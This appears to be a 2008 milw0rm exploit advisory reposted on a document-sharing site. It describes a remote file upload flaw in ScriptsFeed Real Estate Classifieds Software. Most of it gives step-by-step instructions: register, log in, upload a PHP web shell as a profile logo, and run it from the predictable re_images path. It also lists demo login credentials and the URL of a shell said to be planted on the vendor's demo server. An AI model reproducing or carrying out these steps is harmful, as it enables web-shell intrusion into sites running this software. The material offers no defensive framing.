ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln by h3m4n

VIEWS: 26 PAGES: 2

									                       ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln         Page 1/2
  1    [~]   ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
  2    [~]
  3    [~]   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  4    [~]   Discovered By: ZoRLu
  5    [~]
  6    [~]   Date: 13.11.2008
  7    [~]
  8    [~]   Home: www.z0rlu.blogspot.com
  9    [~]
  10   [~]   contact: trt−turk@hotmail.com
  11   [~]
  12   [~]   N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
  13   [~]
  14   [~]   my bug number now: 39
  15   [~]
  16   [~]   my target bug number: 100
  17   [~]
  18   [~]   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  19
  20
  21   Exploit:
  22
  23   http://localhost/script/re_images/[id]_logo_your_shell.php
  24
  25   you register to site
  26
  27   register: http://localhost/script/register.php
  28
  29   after you login to site
  30
  31   login: http://localhost/script/login.php
  32
  33   more after you go profile edit
  34
  35   profile: http://localhost/script/profile.php
  36
  37   and you upload your_shell.php right click to your logo and select properties copy link
  38
  39   paste your explorer go your_shell.php
  40
  41   your_shell.php path:
  42
  43   http://localhost/script/re_images/[id]_logo_your_shell.php
  44
  45
  46
  47   rfu for demo:
  48
  49   user: zorlu
  50
  51   passwd: zorlu1
  52

ZoRLu                                                                                           11/13/2008
                     ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln   Page 2/2
  53   shell path:
  54
  55   http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
  56
  57
  58   [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  59   [~] Greetz tO: str0ke & all Muslim HaCkeRs
  60   [~]
  61   [~] yildirimordulari.org & darkc0de.com
  62   [~]
  63   [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  64
  65   # milw0rm.com [2008−11−13]




ZoRLu                                                                                   11/13/2008

								
To top